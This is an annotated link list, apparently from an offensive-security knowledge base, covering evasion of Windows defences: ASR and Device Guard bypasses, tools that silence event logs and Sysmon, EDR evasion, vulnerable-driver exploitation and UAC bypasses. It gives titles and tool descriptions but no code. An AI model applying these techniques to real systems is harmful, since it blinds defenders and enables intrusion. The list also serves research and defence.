- How to bypass all of Microsoft's latest "Attack Surface Reduction" rules with malicious Office documents and scripts. In the last years, I have been doing some research around Windows security. I liked exploring APT/Redteam techniques and payloads used for social engineering and airgap bypass attacks. I am naturally interested in new security features such as ASR. Microsoft introduced Attack Surface Reduction (ASR) as part of Windows Defender Exploit Guard. ASR is composed of a set of configurable rules such as: "Block Office applications from creating child process". While these rules seem effective against common Office and script malware, there are ways to bypass all of them. We will go over each rule related to malicious Office or VB script behavior, analyze how it works behind the scenes and find a way to bypass it. As an example we will take common attack scenarios and see how they can be achieved with all rules enforced: Download execute DLL/EXE/script from Office/VBscript; Drop execute embedded DLL/EXE/script from Office/VBscript; Machine takeover with Meterpreter shell from Office/VBscript; Lateral movement/UAC bypass/AMSI bypass/etc.
- Adapting Exploit Frameworks to Evade Microsoft ATP - Jake Krasnov, Anthony Rose(Defcon27)
-
Tools
- Windows Defender Emulator Tools
-
ExpandDefenderSig.ps1
- Decompresses Windows Defender AV signatures for exploration purposes
-
Ninjasploit
- A meterpreter extension for applying hooks to avoid windows defender memory scans
-
ThreatCheck - RastaMouse
- Modified version of Matterpreter's DefenderCheck. Takes a binary as input (either from a file on disk or a URL), splits it until it pinpoints the exact bytes that the target engine will flag on, and prints them to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.
-
DeviceGuard
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
ExploitGuard
-
101
-
Protect devices from exploits - docs.ms
- Exploit protection automatically applies a number of exploit mitigation techniques to operating system processes and apps. Exploit protection is supported beginning with Windows 10, version 1709 and Windows Server, version 1803.
-
Windows Defender Exploit Guard under the hood - Artur Wojtkowski
- In this article, we will explain the main functionality of Exploit Protection and ASR rules and its’ internals.
-
Articles/Blogposts/Writeups
-
Exploit Protection Event Documentation - Palantir & Matt Graeber
- Documentation and supporting script sample for Windows Exploit Guard
- Assessing the effectiveness of a new security data source: Windows Defender Exploit Guard - Palantir(2019)
- Vulnserver Exploit vs Windows Defender Exploit Guard - Chad Duffey(2020)
- Exploit Guard Mistakes - Chad Duffey(2020)
- Exploit Guard vs Process (DLL) Injection - Chad Duffey(2020)
- Talks/Presentations/Videos
-
Windows Event Log Avoidance & Deletion
-
Articles/Writeups
-
Remove individual lines from Windows XML Event Log (EVTX) files
- Phant0m: Killing Windows Event Log - artofpwn.com
- Universally Evading Sysmon and ETW - Dylan Halls(2020)
- Mute Sysmon - Silence Sysmon via event manifest tampering - SecurityJosh(2020)
- Deletion and Bypass of Windows Logs - 3gstudent
- Domain Controller Security Logs – how to get at them without being a Domain Admin - girlgerms(2016)
- Pwning Windows Event Logging with YARA rules - Dylan Halls(2020)
- Disabling Windows Event Logs by Suspending EventLog Service Threads - @spottheplanet
-
Tools
-
Ghost In The Logs
- This tool allows you to evade sysmon and windows event logging, my blog post about it can be found here
-
Invoke-Phant0m
- This script walks the thread stacks of the Event Log Service process (a specific svchost.exe), identifies the Event Log threads and kills them. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-
Log-killer
- Clear all your logs in [linux/windows] servers
-
MuteSysmon
- A PowerShell script to prevent Sysmon from writing its events
-
Windows-EventLog-Bypass
- Uses the subProcessTag value from the TEB to identify Event Log threads. Uses the NtQueryInformationThread API and the I_QueryTagInformation API to get the service name of the thread. Automatically kills the Event Log Service threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-
EvtMute
- This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging.
-
Microsoft ATA & ATP
-
Articles/Blogposts/Talks/Writeups
- Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics
- Red Team Revenge - Attacking Microsoft ATA
- Evading Microsoft ATA for Active Directory Domination
- Week of Evading Microsoft ATA - Announcement and Day 1 - Nikhil Mittal(Aug 2017)
- Week of Evading Microsoft ATA - Day 2 - Overpass-the-hash and Golden Ticket - Nikhil Mittal
- Week of Evading Microsoft ATA - Day 3 - Constrained Delegation, Attacks across trusts, DCSync and DNSAdmins - Nikhil Mittal
- Week of Evading Microsoft ATA - Day 4 - Silver ticket, Kerberoast and SQL Servers - Nikhil Mittal
- Week of Evading Microsoft ATA - Day 5 - Attacking ATA, Closing thoughts and Microsoft's response - Nikhil Mittal
- Microsoft Advanced Threat Analytics – My best practices - Oddvar Moe
- Evading WinDefender ATP credential-theft: kernel version - B4rtik
-
Talks/Presentations/Videos
-
Red Team Techniques for Evading, Bypassing, and Disabling MS Advanced Threat Protection and Advanced Threat Analytics - Chris Thompson(BHUSA2017)
- Windows Defender Advanced Threat Protection is now available for all Blue Teams to utilize within Windows 10 Enterprise and Server 2012/16, which includes detection of post breach tools, tactics and techniques commonly used by Red Teams, as well as behavior analytics.
- Evading Microsoft ATA for Active Directory Domination - Nikhil Mittal(BH USA17)
- Hack to Basics – Adapting Exploit Frameworks to Evade Microsoft ATP - BC-Security(2019)
-
Tools
-
DefenderCheck
- Takes a binary as input and splits it until it pinpoints the exact byte that Microsoft Defender will flag on, and then prints those offending bytes to the screen.
-
DeviceGuard Bypass
- 101
-
Articles/Blogposts/Talks/Writeups
- Defeating Device Guard: A look into CVE-2017-0007
- Consider Application Whitelisting with Device Guard - subt0x10(2017)
- Bypassing Application Whitelisting using MSBuild.exe - Device guard Example and Mitigations - subt0x10(2017)
- Defeating Device Guard: A look into CVE-2017–0007 - Matt Nelson
- UMCI vs Internet Explorer: Exploring CVE-2017–8625 - Matt Nelson
- Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass - Google
- Talks/Presentations/Videos
-
Tools
-
DeviceGuard Bypasses - James Forshaw
- This solution contains some of my UMCI/Device Guard bypasses. They are designed to allow you to analyze a system, such as Windows 10 S, which comes pre-configured with a restrictive UMCI policy.
- Window 10 Device Guard Bypass
-
DLL Execution-Related
- DLL Hijacking
-
DLL Hollowing/Module Stomping/Overloading
- 101
-
Articles/Blogposts/Writeups
- Remote DLL Injection, Plus… - Security Ninja(2016)
- Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing - Sumith Maniath, Prashanth Krushna Kadam(2019)
- Hiding malicious code with “Module Stomping”: Part 1 - Aliz Hammond(2019)
- Hiding malicious code with “Module Stomping”: Part 2 - Aliz Hammond(2019)
- Understanding And Detecting Dll 1nj3ct0n & Process Hollowing - Alparslan Akyıldız academy(2019)
- Detecting VBA Process Hollowing With Cortex XDR - Stav Setty and Aviad Meyer(2020)
- Talks/Presentations/Videos
- Papers
-
Tools
-
Phantom DLL hollowing
- DLL hollowing is a technique which can be used to provide stealth for malware in memory, either within the local process or a remote one (in combination with process injection/hollowing).
- CodeCoverageModuleStomping
-
Drivers
-
101
- Overview of Device and Driver Installation - docs.ms
- Getting a kernel mode driver signed for Windows 10 - Christoph Lüders(2016)
- Methodology for Static Reverse Engineering of Windows Kernel Drivers - Matt Hand(2020)
- Kernel Hacking With HEVD Part 1 - The Setup - Brian Beaudry(2016)
-
HackSys Extreme Vulnerable Driver
- HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level.
- See Rootkits.md
- Articles/Blogposts/Writeups
- Shhmon — Silencing Sysmon via Driver Unload - Matt Hand(2019)
- How to Bypass Kernel Anticheat & Develop Drivers - Rake(2018)
- Undocumented Windows API Functions & Structures - Rake(2020)
- Ring 0 / 3 Protection - Jitsumi(2020)
- Debugging
-
Filter Drivers
-
101
- Filter Drivers - docs.ms
- About file system filter drivers - docs.ms
- Filter driver - Wikipedia
-
File systems driver design guide
- This section of the WDK provides conceptual information related to file systems and filter drivers.
- How File System Filter Drivers Are Similar to Device Drivers - docs.ms
- The Role of a Filter Driver - Flylib.com
- FLTMC.exe - SS64
-
Articles
- Understanding Minifilters: Why and How File System Filter Drivers Evolved - OSR.com
- How File System Filter Drivers Are Different from Device Drivers
- Introduction to File System Filter Drivers - EaseFilter
- Understanding Windows File System Filter Driver - EaseFilter
- Filter Drivers in Windows - MohanKumar(2017)
- Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver - Matt Hand(2020)
- Hunting for Bugs in Windows Mini-Filter Drivers - James Forshaw(2021)
-
Driver Loading/Unloading
- Articles/Blogposts/Writeups
-
Attacking
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Who’s Watching the Watchdog? Uncovering a Privilege Escalation Vulnerability in OEM Driver - Amit Rapaport(BlueHat IL2019)
- With Microsoft continuously improving kernel mitigations and raising the exploitation bar for native kernel components, third-party kernel drivers are becoming a more appealing target for real attackers and security researchers. A vulnerability in a signed third-party driver can have a dramatic impact as it can be abused by attackers to escalate their privileges, without the complexity of a kernel zero-day. Computer manufacturers usually ship devices with software and tools to facilitate device management. This software often contains components running with ring-0 privileges in kernel. With these components installed by default, they must be as secure as the kernel, otherwise they can become the Achilles Heel for the whole kernel security design. In this session, we’ll explain exactly how we discovered such a driver. From an anomalous behavior alerted by a kernel sensor of Windows Defender ATP, we dug deeper into a specific device management driver, where we found a highly obscure design. This led us to the discovery of a zero-day vulnerability, which resulted in a local privilege escalation that affected millions of devices.
- Device Driver Debauchery and MSR Madness - Ryan Warns, Timothy Harrison(INFILTRATE2019)
-
Papers
-
VDM: Vulnerable Driver Manipulation - Xeroxz
- Abstract—This research paper documents the process of using a vulnerable Windows kernel driver exposing a physical memory read and write primitive to call any function inside of the Windows kernel; while also teaching you the basics of paging and physical memory.
- Training
-
Tools
-
ExploitCapcom
- This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through an IOCTL and executes an arbitrary user-supplied function pointer with SMEP disabled. This exploit simply abuses the feature to perform token stealing to get SYSTEM privileges, and then launches the command prompt with the elevated privilege.
-
Reflective-Driver-Loader
- Reflective Kernel Driver injection is an injection technique based on Reflective DLL injection by Stephen Fewer. The technique bypasses Windows driver signing enforcement (KMCS). Reflective programming is employed to perform the loading of a driver from memory into the kernel. As such the driver is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. Injection works on Windows Vista up to Windows 10, running on x64.
-
IRPMon
- The goal of the tool is to monitor requests received by selected device objects or kernel drivers. The tool is quite similar to IrpTracker but has several enhancements. It supports 64-bit versions of Windows (no inline hooks are used, only modifications to driver object structures are performed) and monitors IRP, FastIo, AddDevice, DriverUnload and StartIo requests.
- gdrv-loader
-
Windows10 - Custom Kernel Signers
- Load self-signed drivers without TestSigning or disable DSE.
-
KsDumper
- Dumping processes using the power of kernel space !
-
drvmap
- driver mapper / capcom wrapper
-
KernelBhop
- Cheat that uses a driver instead of the WinAPI for reading / writing memory.
- Shhmon - Neuter Sysmon by unloading its driver
-
TitanHide
- TitanHide is a driver intended to hide debuggers from certain processes. The driver hooks various Nt* kernel functions (using SSDT table hooks) and modifies the return values of the original functions. To hide a process, you must pass a simple structure with a ProcessID and the hiding option(s) to enable, to the driver. The internal API is designed to add hooks with little effort, which means adding features is really easy.
-
Writeups
- Part 19: Kernel Exploitation -> Logic bugs in Razer rzpnk.sys - FuzzySec
- MSI ntiolib.sys/winio.sys local privilege escalation - rewolf(2016)
- Dell SupportAssist Driver - Local Privilege Escalation - hatRiot(2018)
- Mother of All Drivers – New Vulnerabilities Found in Windows Drivers - Jesse Michael, Mickey Shkatov
- CVE-2019-9730: LPE in Synaptics Sound Device Driver - @Jackson_T(2019)
- Viper RGB Driver Local Privilege Escalation (CVE-2019-18845) - ActiveCyber.us(2020)
- CORSAIR iCUE Driver Local Privilege Escalation (CVE-2020-8808) - ActiveCyber.us(2020)
- MSI Ambient Link Multiple Vulnerabilities - CoreSecurity(2020)
- CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys - h0mbre(2020)
-
Dissecting the Windows Defender Driver - WdFilter (Part 1) - n4r1b(2020)
- For those who don’t know, WdFilter is the main kernel component of Windows Defender. Roughly, this driver works as a Minifilter from the load order group “FSFilter Anti-Virus”; this means that it is attached to the File System stack (actually quite high - big altitude) and handles I/O operations in some Pre/Post callbacks. Not only that, this driver also implements other techniques to get information on what’s going on in the system. The goal of this series of posts is to have a solid understanding of how this works under the hood.
- Part 2
- Part 3
- Part 4
- How to Bypass Kernel Anticheat & Develop Drivers - Rake(2018)
- Undocumented Windows API Functions & Structures - Rake(2020)
- Ring 0 / 3 Protection - Jitsumi(2020)
-
Papers
-
Windows Kernel-mode Payload Fundamentals - bugcheck, skape(2006)
- This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
- MS ELAM
- Writing
-
Tools
-
Physmem drivers
- A collection of various vulnerable (mostly physical memory exposing) drivers.
-
Vulnerable Driver Manipulation
- A library to manipulate drivers exposing a physical memory read/write primitive to allow the user to call any function in the kernel. There are thousands of drivers exposing physical memory read/write; a bunch are listed in this repo. Currently the project is using gdrv.sys. This is basically what physmeme was about, but that project is not truly "physical read and write" whereas this project is. This project can be used more broadly than physmeme.
-
DriverMon
- Monitor activity of (almost) any driver
-
Capcom Rootkit Proof-Of-Concept
- Capcom Rootkit POC
- Windows kernel driver exploits
-
ColdHide
- ColdHide is a mini and simple open source user mode anti-anti debug library x86/x64 for Windows. To inject this library try using ColdMDLoader.
-
Canadian Furious Beaver
- Canadian Furious Beaver is a tool for hijacking IRPs handler in Windows drivers, and facilitating the process of analyzing Windows drivers for vulnerabilities
-
TDL (Turla Driver Loader)
- Driver loader for bypassing Windows x64 Driver Signature Enforcement
-
injdrv
- injdrv is a proof-of-concept Windows Driver for injecting DLL into user-mode processes using APC.
-
Endpoint Detection & Response
-
Articles/Blogposts/Talks/Writeups
- Lets Create An EDR… And Bypass It! Part 1 - Ceri Coburn(2020)
- A Guide to Reversing and Evading EDRs: Part 1 - @Jackson_T
- Endpoint Protection, Detection and Response Bypass Techniques Index - p3zx.blogspot
-
Generic bypass of next-gen intrusion / threat / breach detection systems
- The focus of this blog post is to bypass network monitoring tools, e.g. good-old IDS or next-generation threat detection systems in a generic way. The focus is on the exploit delivery.
- Relying on usermode data is a bad idea (AKA Stop Trusting The Enemy) - krabsonsecurity(2020)
- Dechaining Macros and Evading EDR
- A tale of EDR bypass methods - s3cur3th1ssh1t(2021)
-
Talks/Presentations/Videos
-
EDR, ETDR, Next Gen AV is all the rage, so why am I enraged? - Michael Gough - Derbycon7
- A funny thing happened when I evaluated several EDR, ETDR and Next Gen AV products, currently all the rage and latest must have security solution. Surprisingly to me the solutions kinda sucked at things we expected them to do or be better at, thus this talk so you can learn from our efforts. While testing, flaws were discovered and shared with the vendors, some of the flaws, bugs, or vulns that were discovered will be discussed. This talk takes a look at what we initially expected the solutions to provide us, the options or categories of what these solutions address, what to consider when doing an evaluation, how to go about testing these solutions, how they would fit into our process, and what we found while testing these solutions. What enraged me about these EDR solutions were how they were all over the place in how they worked, how hard or ease of use of the solutions, and the fact I found malware that did not trigger an alert on every solution I tested. And this is the next new bright and shiny blinky security savior solution? The news is not all bad, there is hope if you do some work to understand what these solutions target and provide, what to look for, and most importantly how to test them! What we never anticipated or expected is the tool we used to compare the tests and how well it worked and how it can help you.
-
Modern Evasion Techniques - Jason Lang(Derbycon7 2017)
- Slides
- As pentesters, we are often in need of working around security controls. In this talk, we will reveal ways that we bypass in-line network defenses, spam filters (in line and cloud based), as well as current endpoint solutions. Some techniques are old, some are new, but all work in helping to get a foothold established. Defenders: might want to come to this one.
- Next Gen AV vs My Shitty Code by James Williams - SteelCon 2018
- Red Teaming in the EDR age - Will Burgess(WWHF2018)
- An Inconvenient Truth: Evading the Ransomware Protection in Windows 10 - Soya Aoyama(GrrCON2018)
-
Maintaining post-exploitation opsec in a world with EDR - Michael Roberts, Martin Roberts(Derbycon2018)
- How a modern pentesting or red team can remain stealthy during post exploitation activities. Will go in depth on various code execution and lateral movement techniques and indicate ways to improve upon these methods.
-
Reversing & bypassing EDRs - Christopher Vella(CrikeyCon2019)
- Endpoint Detection and Response (EDR) product vendors will give you the spiel on what they do and their capabilities, but how do they actually work at the lowest level? And how can we discover weaknesses in these products to develop bypasses or evaluate them? Christopher will reverse engineer an EDR product and the windows kernel to unveil its inner-workings, alongside the windows kernel structures and functions EDR products rely on to operate, and by doing so discover weaknesses and gaps in their protections that allow actors to bypass the product’s defenses, rendering them null & void. Finally, by abusing an identified weakness, he’ll use a custom-built mimikatz to dump all the hashes on a machine protected by EDR.
-
Testing Endpoint Protection: How Anyone Can Bypass Next Gen AV - Kevin Gennuso(Derbycon2019)
- Well-known antivirus vendors all have "next gen" solutions, and most newer players in the market claim to be "better" simply because they're new. This software is a significant investment for any organization, so it should do what it claims to do, right? In this talk, we'll discuss methodologies for testing these products, known and lesser-known payload generation frameworks, and how you can use these to inform your choice in EDR solutions.
-
Unveiling the Underground World of Anti-Cheats - Joel Noguera(BHEU2019)
- Slides
- During our research, we analyzed, tested and discovered multiple bypassing techniques against different current market Anti-Cheat technologies such as XignCode3, EasyAntiCheat and BattleEye, to understand and determine the current state of the art of Anti-Cheat software. We use a combination of static and dynamic techniques to document the different techniques to protect and unprotect gaming software. As a result, we put together a tool "AntiCheat-Testing-Framework" that contains a series of bypassing techniques to test them against current market Anti-Cheats software, this will allow attendees and researchers to understand the virtues and weaknesses of them. This talk pretends to catch everyone's attention from new people to experts on the field, starting with a state of the market and interesting cases around the cheating world, and finishing with a deep explanation of each analyzed technique and the results we obtained during the journey.
-
Tricking modern endpoint security products - Michel Coene(SANS2020)
- The current endpoint monitoring capabilities we have available to us are unprecedented. Many tools and our self/community-built detection rules rely on parent-child relationships and command-line arguments to detect malicious activity taking place on a system. There are, however, ways the adversaries can get around these detections. During this presentation, we'll talk about the following techniques and how we can detect them: Parent-child relationships spoofing; Command-line arguments spoofing; Process injection; Process hollowing
- Tradecraft - This is why your tools and exploits get detected by EDR - xentropy(2020)
- Offensive Development: Post-Exploitation Tradecraft in an EDR World - Dominic Chell(x33fcon2020)
-
Detection and Efficiency Testing of Endpoint Security Sensors - Filipi Pires(HTBCyberWeek2020)
- During this presentation we’ll show our tests performed in three different endpoint security solutions (CrowdStrike, Sophos, and Cybereason) where we simulate targeted attacks using many strategies of attacks to obtain a panoramic view of the resilience presented by the solutions, with regard to the efficiency in its detection by signatures, NGAV and Machine Learning, running scripts, such as: Download many malwares within the victim machine, moving all those malware to other folders (expectation of detection without execution), and as well as, an idea in to download these artifacts directly on the victim’s machine using malware from The Zoo Repository while also running scripts with powershell downloading daily malwares batches, provide by MalwaresBazaar using API access.
-
Tools
-
SharpBlock
- A method of bypassing EDRs' active protection DLLs by preventing entry point execution
- WhiteBeam
-
BLUESPAWN
- BLUESPAWN is an active defense and endpoint detection and response tool which means it can be used by defenders to quickly detect, identify, and eliminate malicious activity and malware across a network.
-
ProcessThis
- Small C# tool to call out AV/EDR processes running.
-
Invoke-EDRChecker
- Checks running processes, process metadata, DLLs loaded into your current process and each DLL's metadata, common install directories, installed services, the registry and running drivers for the presence of known defensive products such as AVs, EDRs and logging tools.
-
SharpEDRChecker
- Checks running processes, process metadata, DLLs loaded into your current process and each DLL's metadata, common install directories, installed services and each service binary's metadata, installed drivers and each driver's metadata, all for the presence of known defensive products such as AVs, EDRs and logging tools.
-
Telemetry Sourcerer
- Enumerate and disable common sources of telemetry used by AV/EDR.
-
Specific EDRs
- Cybereason
-
Cylance
- Bypass Cylance Memory Exploitation Defense & Script Cntrl - Chris Ross(2017)
- How I evaded “next-generation” Cylance Smart AntiVirus in less than 15 minutes - slaeryan
- Silencing Cylance: A Case Study in Modern EDRs - Adam Chester, Dominic Chell(2019) - https://www.mdsec.co.uk/2019/03/silencing-cylance-a-case-study-in-modern-edrs/
-
Cylance, I Kill You! - Adi Ashkenazy, Shahar Zini(2019)
- "By carefully analyzing the engine and model of Cylance’s AI based antivirus product, we identify a peculiar bias towards a specific game. Combining an analysis of the feature extraction process, its heavy reliance on strings, and its strong bias for this specific game, we are capable of crafting a simple and rather amusing bypass. Namely, by appending a selected list of strings to a malicious file, we are capable of changing its score significantly, avoiding detection. This method proved successful for 100% of the top 10 Malware for May 2019, and close to 90% for a larger sample of 384 malware."
- Crowdstrike
- Kaspersky
- McAfee
- Palo Alto
- Symantec
-
Kernel Callbacks
-
Articles/Blogposts/Writeups
-
Silencing the EDR. How to disable process, threads and image-loading detection callbacks. - matteomalvica.com
- This post is about picking up Rui’s very inspiring piece on Windows kernel callbacks and taking it a little further by extending it with new functionality and building an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing LSASS loaded modules or detect malicious activities. We’ll then use our evil driver to temporarily silence any registered AV’s callbacks and restore the EDR's original code once we are done with our task. The resulting tool has been tested on the following Windows 10 builds: 1903, 1909 and 2004.
-
Silencing the EDR. How to disable process, threads and image-loading detection callbacks. - matteomalvica.com
-
Articles/Blogposts/Writeups
PowerShell Script Block Logging
- Articles/Blogposts/Writeups
  - A Critique of Logging Capabilities in PowerShell v6
    - Introduces 'PowerShell Upgrade Attack'
  - Some PowerShell Logging Observations - mrt-f.com
  - Bypass for PowerShell ScriptBlock Warning Logging of Suspicious Commands - cobbr.io(2017)
  - PowerShell ScriptBlock Logging Bypass - cobbr.io(2017)
  - Exploring PowerShell AMSI and Logging Evasion - Adam Chester(2018)
- Talks/Presentations/Videos
- Tools

PowerShell Constrained Language Mode
- Articles/Blogposts/Writeups
  - A Critique of Logging Capabilities in PowerShell v6
    - Introduces 'PowerShell Upgrade Attack'
- Talks/Presentations/Videos
  - Isolated to Constrained Language Mode - Living within the Confines - Christopher Truncer(BSidesDC2018)
    - This talk will cover what constrained language mode is, what works, and what doesn’t compared with the tools you are likely used to using. I’ll talk about building out tools in constrained language mode, the frustrations, and tips to make it easier. I’ll also cover existing tools for operating within a constrained language mode environment, and add a new update to WMImplant based on my approach to building out constrained language mode capabilities.
  - PowerShell Constrained Language Mode Enforcement and Bypass Deep Dive - Matt Graeber(2020)
- Tools

Sysmon
- Articles/Blogposts/Writeups
  - Sysmon Enumeration Overview - @./pwn(2017)
  - Sysmon doing lines - hexacorn(2017)
  - Sysmon doing lines, part 3 - hexacorn(2018)
  - Sysmon doing lines, part 4 - hexacorn(2018)
  - Operating Offensively Against Sysmon - Carlos Perez(2018)
  - Subverting Sysmon: Application of a Formalized Security Product Evasion Methodology - Matt Graeber(BlackHatUSA2018)
  - Subverting Sysmon materials
  - Evading Sysmon DNS Monitoring - Adam Chester(2019)
  - Sysmon Image File Name Evasion - NtRaiseHardError(2020)
  - Sysmon Internals - From File Delete Event to Kernel Code Execution - NtRaiseHardError(2020)
- Talks/Presentations/Videos
- Tools
  - Shhmon - Neuter Sysmon by unloading its driver
  - Sysmon configuration bypass finder
    - Detect possible sysmon logging bypasses given a specific configuration

System Calls
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Tools
  - SysWhispers
    - SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.

Windows User Account Control(UAC)
- 101
  - User Account Control - docs.ms
  - User Account Control Step-by-Step Guide - docs.ms
  - [User Account Control - Steven Sinofsky(blogs.msdn)](https://blogs.msdn.microsoft.com/e7/2008/10/08/user-account-control/)
  - Inside Windows Vista User Account Control - docs.ms
  - User Account Control: Inside Windows 7 User Account Control - Mark Russinovich(2016)
  - User Account Control – What Penetration Testers Should Know - cobaltstrike.com
- Articles/Blogposts/Writeups
  - Anatomy of UAC Attacks - b33f
  - Reading Your Way Around UAC (Part 1) - James Forshaw(2017)
  - Farewell to the Token Stealing UAC Bypass - James Forshaw(2018)
  - CQLabs – How UAC bypass methods really work - Adrian Denkiewicz(2020)
    - In this article, we will analyze a couple of known, still working, UAC bypasses – how they work, what the requirements are, and potential mitigation techniques. Before we dive into this, we need to briefly explain what UAC is.
  - UACMe 3.5, WD and the ways of mitigation - hfiref0x(2020)
  - UAC bypasses from COMAutoApprovalList - hfiref0x(2020)
Talks/Presentations/Videos
-
Not a Security Boundary: Bypassing User Account Control - Matt Nelson(Derbycon2017)
- Microsoft's User Account Control feature, introduced in Windows Vista, has been a topic of interest to many in the security community. Since UAC was designed to force user approval for administrative actions, attackers (and red teamers) encounter UAC on nearly every engagement. As a result, bypassing this control is a task that an actor often has to overcome, despite its lack of formal designation as a security boundary. This talk highlights what UAC is, previous work by others, research methodology, and details several technical UAC bypasses developed by the author.
- FromALPC to UAC-Bypass - @hakril(2017)
-
Not a Security Boundary: Bypassing User Account Control - Matt Nelson(Derbycon2017)
-
Papers
-
Testing UAC on Windows 10 - Ernesto Fernandez(2017)
- User Account Control (UAC) is a mechanism implemented in Windows systems from Vista to prevent malicious software from executing with administrative privileges without user consent. However, this mechanism does not provide a secure solution to that problem, since can be easily bypassed in some ways, something we will show by means of different methods such as DLL hijacking, token impersonation or COM interface elevation, also we will show a new method which we have developed based on a previous one. Moreover, this new Proof of Concept has been ported to the Metasploit Framework as a new module, which indeed is the only UAC bypass module that works in the latest Windows 10 build version.
-
Testing UAC on Windows 10 - Ernesto Fernandez(2017)
-
- Bypasses
  - Fileless UAC Bypass in Windows Store Binary - Activecyber.us(2019)
  - UAC Bypass via SPPLUAObject Class
  - ALPC-BypassUAC
    - UAC Bypass with mmc via alpc
  - Bypassing Windows User Account Control (UAC) and ways of mitigation - Parvez(2014)
  - Bypassing User Account Control (UAC) using TpmInit.exe - uacmeltdown.blogspot
  - UAC Bypass in System Reset Binary via DLL Hijacking - activecyber.us
  - Bypassing UAC on Windows 10 using Disk Cleanup
  - Research on CMSTP.exe
    - Methods to bypass UAC and load a DLL over webdav
  - Bypassing UAC using App Paths - enigma0x3(2017)
  - “Fileless” UAC Bypass Using eventvwr.exe and Registry Hijacking
  - Fileless UAC Bypass using sdclt
  - Eventvwr File-less UAC Bypass CNA - @vysecurity(2016)
  - UAC Bypass or a Story of Three Elevations - xi-tauw(2017)
  - How to bypass UAC in newer Windows versions - zcool(Oct2018)
  - Fileless UAC Bypass in Windows Store Binary - activecyber.us
  - User Account Control & odbcad32.exe - secureyourit.co.uk
  - More Than a Penetration Test (Microsoft Windows CVE-2019–1082) - Michal Bazyli(2019)
  - UAC bypass through Trusted Folder abuse - Jean Maes(2020)
- Talks & Presentations
- Tools
  - UACME
    - Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.
  - DccwBypassUAC
    - This exploit abuses the way "WinSxS" is managed by "dccw.exe" by means of a derivative of Leo Davidson's "Bypass UAC" method so as to obtain an administrator shell without prompting for consent. It supports "x86" and "x64" architectures. Moreover, it has been successfully tested on Windows 8.1 9600, Windows 10 14393, Windows 10 15031 and Windows 10 15062.
  - Bypass-UAC
    - Bypass-UAC provides a framework to perform UAC bypasses based on auto elevating IFileOperation COM object method calls. This is not a new technique; traditionally, this is accomplished by injecting a DLL into "explorer.exe". This is not desirable because injecting into explorer may trigger security alerts and working with unmanaged DLLs makes for an inflexible work-flow. To get around this, Bypass-UAC implements a function which rewrites PowerShell's PEB to give it the appearance of "explorer.exe". This provides the same effect because COM objects exclusively rely on Windows's Process Status API (PSAPI) which reads the process PEB.
  - Fileless_UAC_bypass_WSReset
  - ByeIntegrity — Windows UAC Bypass
    - Bypass UAC by hijacking a DLL located in the Native Image Cache
  - ByeIntegrity 2.0 — Windows UAC Bypass
    - Bypass UAC by abusing the Internet Explorer Add-on installer
  - ByeIntegrity 3.0 — Windows UAC Bypass
    - Bypass UAC by abusing the Security Center CPL and hijacking a shell protocol handler

Specific Techniques

CMD Obfuscation
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
  - Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) - Daniel Bohannon(Derbycon2018)
    - Skilled attackers continually seek out new attack vectors and effective ways of obfuscating old techniques to evade detection. Active defenders can attest to attackers’ prolific obfuscation of JavaScript, VBScript and PowerShell payloads given the ample availability of obfuscation frameworks and their effectiveness at evading many of today’s defenses. However, advanced defenders are increasingly detecting this obfuscation with help from the data science community. This approach paired with deeper visibility into memory-resident payloads via interfaces like Microsoft’s Antimalware Scan Interface (AMSI) is causing some Red Teamers to shift tradecraft to languages that offer defenders less visibility. But what are attackers using in the wild? In the past year numerous APT and FIN (Financial) threat actors have increasingly introduced obfuscation techniques into their usage of native Windows binaries like wscript.exe, regsvr32.exe and cmd.exe. Some simple approaches entail randomly adding cmd.exe’s caret (^) escape character to command arguments. More interesting techniques like those employed by APT32, FIN7 and FIN8 involve quotes, parentheses and standard input. The most interesting obfuscation technique observed in the wild was FIN7’s use of cmd.exe’s string replacement functionality identified in June 2017. This discovery single-handedly initiated my research into cmd.exe’s surprisingly effective but vastly unexplored obfuscation capabilities. In this presentation I will dive deep into cmd.exe’s multi-faceted obfuscation opportunities beginning with carets, quotes and stdin argument hiding. Next I will extrapolate more complex techniques including FIN7’s string removal/replacement concept and two never-before-seen obfuscation and full encoding techniques - all performed entirely in memory by cmd.exe. Finally, I will outline three approaches for obfuscating binary names from static and dynamic analysis while highlighting lesser-known cmd.exe replacement binaries. I will conclude this talk by giving a live demo of my cmd.exe obfuscation framework called Invoke-DOSfuscation that obfuscates payloads using these multi-layered techniques. I will also share detection implications and approaches for this genre of obfuscation.
- Tools

Debuggers
- Batch, attach and patch: using windbg’s local kernel debugger to execute code in windows kernel
